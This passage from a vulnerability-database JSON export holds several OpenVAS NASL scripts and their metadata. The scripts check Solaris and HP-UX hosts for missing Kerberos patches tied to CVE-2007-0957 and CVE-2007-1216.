script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-11\", package:\"SUNWcstl SUNWcsu SUNWgss SUNWcsl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:14", "description": "Check for the Version of krb5 usr/lib", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for krb5 usr/lib 112923-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855610", "href": "http://plugins.openvas.org/nasl.php?oid=855610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for krb5 usr/lib 112923-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"krb5 usr/lib on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n krb5 usr/lib\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855610);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112923-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for krb5 usr/lib 112923-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112923-04-1\");\n\n script_summary(\"Check for the Version of krb5 usr/lib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112923-04\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:41", "description": "Check for the Version of kadmind & kdb5_util", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for kadmind & kdb5_util 116044-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855236", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kadmind & kdb5_util 116044-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kadmind & kdb5_util on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kadmind & kdb5_util\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855236\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116044-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for kadmind & kdb5_util 116044-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116044-04-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kadmind & kdb5_util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116044-04\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:24", "description": "Check for the Version of Kerberos", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Kerberos HPSBUX02217", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835065", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835065", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Kerberos HPSBUX02217\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote arbitrary code execution\";\ntag_affected = \"Kerberos on\n HP-UX B.11.11, B.11.23, and B.11.31 running the\";\ntag_insight = \"A potential security vulnerability has been identified on HP-UX running \n Kerberos. The vulnerability could be exploited by remote authorized users to \n execute arbitrary code.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01056923-3\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835065\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02217\");\n script_cve_id(\"CVE-2007-1216\");\n script_name( \"HP-UX Update for Kerberos HPSBUX02217\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Kerberos\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA32SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA64SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-64SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-E-A-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-E-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-S-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-PRG-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-RUN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-SHLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5IA32SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5IA64SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-ENG-A-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA32SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA64SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-E-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-S-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-PRG\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-RUN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-64SLIB-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-E-A-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-E-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-S-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-PRG-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-RUN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-SHLIB-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-PRG\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-RUN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-ENG-A-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-E-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-S-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:22", "description": "Check for the Version of Kerberos", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Kerberos HPSBUX02217", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835065", "href": "http://plugins.openvas.org/nasl.php?oid=835065", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Kerberos HPSBUX02217\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote arbitrary code execution\";\ntag_affected = \"Kerberos on\n HP-UX B.11.11, B.11.23, and B.11.31 running the\";\ntag_insight = \"A potential security vulnerability has been identified on HP-UX running \n Kerberos. The vulnerability could be exploited by remote authorized users to \n execute arbitrary code.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01056923-3\");\n script_id(835065);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02217\");\n script_cve_id(\"CVE-2007-1216\");\n script_name( \"HP-UX Update for Kerberos HPSBUX02217\");\n\n script_summary(\"Check for the Version of Kerberos\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA32SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA64SLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_36361'], rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-64SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-E-A-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-E-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-S-MAN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-PRG-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-RUN-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-SHLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5IA32SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5IA64SLIB-A\", revision:\"D.1.3.5.06\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-ENG-A-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA32SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-IA64SLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-E-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-S-MAN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-PRG\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-RUN\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_34991'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-64SLIB-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-E-A-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-E-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-J-S-MAN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-PRG-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-RUN-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"krb5client.KRB5-SHLIB-A\", revision:\"C.1.3.5.06\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-SHLIB\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-PRG\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-RUN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-ENG-A-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-E-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-JPN-S-MAN\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"KRB5-Client.KRB5-64SLIB\", patch_list:['PHSS_36286'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.5, "vector": 